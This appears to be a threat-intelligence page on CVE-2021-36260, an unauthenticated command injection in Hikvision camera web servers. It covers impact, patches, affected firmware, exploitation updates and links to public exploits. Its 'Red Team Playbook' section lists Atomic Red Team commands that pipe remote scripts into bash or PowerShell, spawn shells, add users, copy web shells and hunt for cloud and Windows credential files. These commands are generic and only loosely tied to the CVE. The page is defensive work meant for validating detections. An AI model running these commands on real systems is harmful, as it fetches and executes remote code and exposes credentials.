CVE-2021-36260
Overview
This vulnerability is a command injection flaw arising from insufficient input validation in the web server component of certain Hikvision firmware versions. The root cause is the failure to properly sanitize user-supplied input within XML parameters processed by the web server, enabling execution of arbitrary shell commands. The affected feature is the web interface's language configuration endpoint, which processes XML data without adequate filtering of embedded commands.
Vulnerability Description
A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
Impact
An attacker can execute arbitrary system commands on affected devices without any authentication or user interaction. This enables full control over the device, including access to sensitive data, modification of configurations, and potential pivoting within the network. The vulnerability facilitates unauthorized remote code execution, leading to complete compromise of the device’s integrity and availability, impacting surveillance operations and potentially exposing video feeds or device credentials.
Solution
Hikvision has released security advisories detailing patches for affected firmware versions. Users should update to the latest firmware versions as specified in Hikvision’s official security notification at https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/. The advisory provides version-specific updates and instructions for mitigating this vulnerability. Applying these vendor-supplied firmware updates is the primary remediation step to eliminate the command injection risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical command injection vulnerability exists within the web server component of several Hikvision products, primarily due to inadequate input validation mechanisms. This flaw allows an attacker to send specially crafted messages containing malicious commands, which the vulnerable system may execute without proper sanitization. The nature of this vulnerability lies in its ability to manipulate the command execution flow, enabling unauthorized actions that could compromise the integrity and confidentiality of the affected systems. The high CVSS score of 9.8 indicates the severity of the issue, highlighting the potential for significant exploitation if left unaddressed.
Attack vectors for this vulnerability are diverse, with the primary method involving the submission of crafted HTTP requests to the web server. An attacker could leverage this flaw to execute arbitrary commands on the underlying operating system, potentially leading to full system compromise. For instance, by embedding malicious payloads within legitimate requests, an attacker could gain unauthorized access to sensitive data, escalate privileges, or even disrupt service availability. Scenarios may include remote code execution, where the attacker gains control over the device, or lateral movement within a network, exploiting other connected devices. The simplicity of the attack, combined with the widespread deployment of affected products, raises significant concerns for organizations relying on these systems.
The real-world impact of this vulnerability can be profound, particularly for businesses that utilize Hikvision products for surveillance and security purposes. Successful exploitation could lead to unauthorized access to sensitive video feeds, manipulation of security settings, or even complete takeover of security infrastructure. This not only poses a direct threat to physical security but also exposes organizations to reputational damage, regulatory penalties, and financial losses. The potential for data breaches and the subsequent fallout can severely undermine customer trust and lead to long-term consequences for affected businesses.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware and applying security patches provided by the vendor is crucial in addressing known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter and monitor HTTP traffic, blocking malicious requests before they reach the vulnerable web server. Network segmentation can also limit the impact of a successful attack, ensuring that compromised devices do not provide a gateway to critical systems. Continuous monitoring and logging of system activities will aid in the early detection of suspicious behavior, allowing for prompt incident response.
In conclusion, the command injection vulnerability in Hikvision products represents a significant risk to organizations that utilize these devices for security and surveillance. The potential for exploitation underscores the importance of robust security practices, including timely updates, proactive monitoring, and comprehensive incident response strategies. By understanding the technical details, attack vectors, real-world impacts, and effective mitigation strategies, organizations can better protect themselves against the threats posed by this vulnerability and similar security issues in the future.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting the command injection vulnerability in Hikvision web servers. This surge is characterized by the emergence of multiple new proof-of-concept exploits publicly available on GitHub, including a Metasploit module that significantly lowers the technical barrier for attackers. Additionally, the vulnerability has been formally added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its criticality and increasing the likelihood of widespread targeting. Our telemetry indicates a rapid expansion of the exploit landscape with diverse automated tools facilitating mass scanning and exploitation attempts. Correspondingly, the EPSS score has surged to near certainty, reflecting a heightened probability of active exploitation in the wild. These developments elevate the threat level to critical, as the availability of sophisticated exploitation frameworks and official recognition by CISA substantially increase the risk of successful attacks against vulnerable Hikvision devices.
Update 2 — July 10, 2026
CSURFACE threat intelligence has detected a modest increase in exploitation attempts targeting the command injection vulnerability in Hikvision web servers. This slight uptick in telemetry indicates continued attacker interest and ongoing scanning activity, although the overall exploitation momentum remains stable without signs of rapid escalation. The persistence of multiple publicly available proof-of-concept tools continues to lower the barrier for adversaries to conduct automated attacks, sustaining a consistent threat presence. While ransomware groups have not been directly linked to this vulnerability at this time, the sustained exploitation activity underscores the potential for opportunistic threat actors to leverage these weaknesses in broader attack campaigns. Given the stable yet persistent exploitation trend, defenders should maintain vigilance, as the risk of successful compromise remains elevated but has not intensified dramatically since the last assessment.
Affected Products (305)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Hikvision | Ds-2cd2026g2-Iu\/sl Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2026g2-iu\/sl_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2046g2-Iu\/sl Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2046g2-iu\/sl_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2066g2-I\(U\) Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2066g2-i\(u\)_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2066g2-Iu\/sl Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2066g2-iu\/sl_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2086g2-I\(U\) Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2086g2-i\(u\)_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2086g2-Iu\/sl Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2086g2-iu\/sl_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2166g2-I\(Su\) Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2166g2-i\(su\)_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2186g2-I\(Su\) Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2186g2-i\(su\)_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2186g2-Isu Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2186g2-isu_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2326g2-Isu\/sl Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2326g2-isu\/sl_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2346g2-Isu\/sl Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2346g2-isu\/sl_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2366g2-I\(U\) Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2366g2-i\(u\)_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2366g2-Isu\/sl Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2366g2-isu\/sl_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2386g2-I\(U\) Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2386g2-i\(u\)_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2386g2-Isu\/sl Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2386g2-isu\/sl_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2426g2-I Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2426g2-i_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2446g2-I Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2446g2-i_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2526g2-I\(S\) Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2526g2-i\(s\)_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2526g2-Is Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2526g2-is_firmware:-:*:*:*:*:*:*:*
|
|
|
Hikvision | Ds-2cd2546g2-I\(S\) Firmware | N/A |
cpe:2.3:o:hikvision:ds-2cd2546g2-i\(s\)_firmware:-:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Hikvision IP Camera Unauthenticated Command Injection
exploits/linux/http/hikvision_cve_2021_36260_blind
|
Watchful_IP, bashis, jbaines-r7 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Hikvision Web Server Build 210702 - Command Injection | bashis | webapps | hardware | - | View |
GitHub PoCs (13)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
tamim1089/HikvisionExploiter
HikvisionExploiter is a Python-based utility designed to automate exploitation and directory accessibility checks on Hik...
|
tamim1089 | 366 | 64 | 2024-07-05 | View |
|
Aiminsun/CVE-2021-36260
command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, a...
|
Aiminsun | 296 | 78 | 2021-10-27 | View |
|
Cuerz/CVE-2021-36260
海康威视RCE漏洞 批量检测和利用工具
|
Cuerz | 169 | 24 | 2022-08-03 | View |
|
TaroballzChen/CVE-2021-36260-metasploit
the metasploit script(POC) about CVE-2021-36260
|
TaroballzChen | 20 | 7 | 2021-11-03 | View |
|
rabbitsafe/CVE-2021-36260
CVE-2021-36260
|
rabbitsafe | 17 | 5 | 2021-10-18 | View |
|
tuntin9x/CheckHKRCE
CVE-2021-36260
|
tuntin9x | 7 | 4 | 2021-12-13 | View |
|
NanoTrash/hikvision_brute
Brute Hikvision CAMS with CVE-2021-36260 Exploit
|
NanoTrash | 3 | 2 | 2024-03-07 | View |
|
aengussong/hikvision_probe
Identify hikvision ip and probe for cve-s (CVE-2017-7921, CVE-2022-28171, CVE-2021-36260)
|
aengussong | 3 | 0 | 2024-11-26 | View |
|
yanxinwu946/hikvision-unauthenticated-rce-cve-2021-36260
海康威视RCE漏洞 批量检测和利用工具
|
yanxinwu946 | 3 | 0 | 2026-01-21 | View |
|
haingn/HIK-CVE-2021-36260-Exploit
|
haingn | 1 | 0 | 2023-10-22 | View |
|
saaydmr/hikvision-exploiter
CVE-2017-7921, CVE-2021-36260 updated 21/01/2026
|
saaydmr | 1 | 0 | 2026-01-21 | View |
|
code-msga/HikvisionExploiter_fixed
HikvisionExploiter - это Python утилита созданная для автоматизации сканирования и проверки прямого доступа к сети камер...
|
code-msga | 0 | 0 | 2026-03-26 | View |
|
shubtheone/CVE-2021-36260-hikvision
|
shubtheone | 0 | 0 | 2026-01-15 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
43%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-36260 |
| hikvision.com |
GitHub CVE
x_refsource_MISC
|
https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/ |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/164603/Hikvision-Web-Server-Build-210702-Command-Injection.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/166167/Hikvision-IP-Camera-Unauthenticated-Command-Injection.html |
| cyfirma.com |
GitHub CVE
x_refsource_MISC
|
https://www.cyfirma.com/wp-content/uploads/2022/08/HikvisionSurveillanceCamerasVulnerabilities.pdf |
| therecord.media |
GitHub CVE
x_refsource_MISC
|
https://therecord.media/experts-warn-of-widespread-exploitation-involving-hikvision-cameras/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-36260 |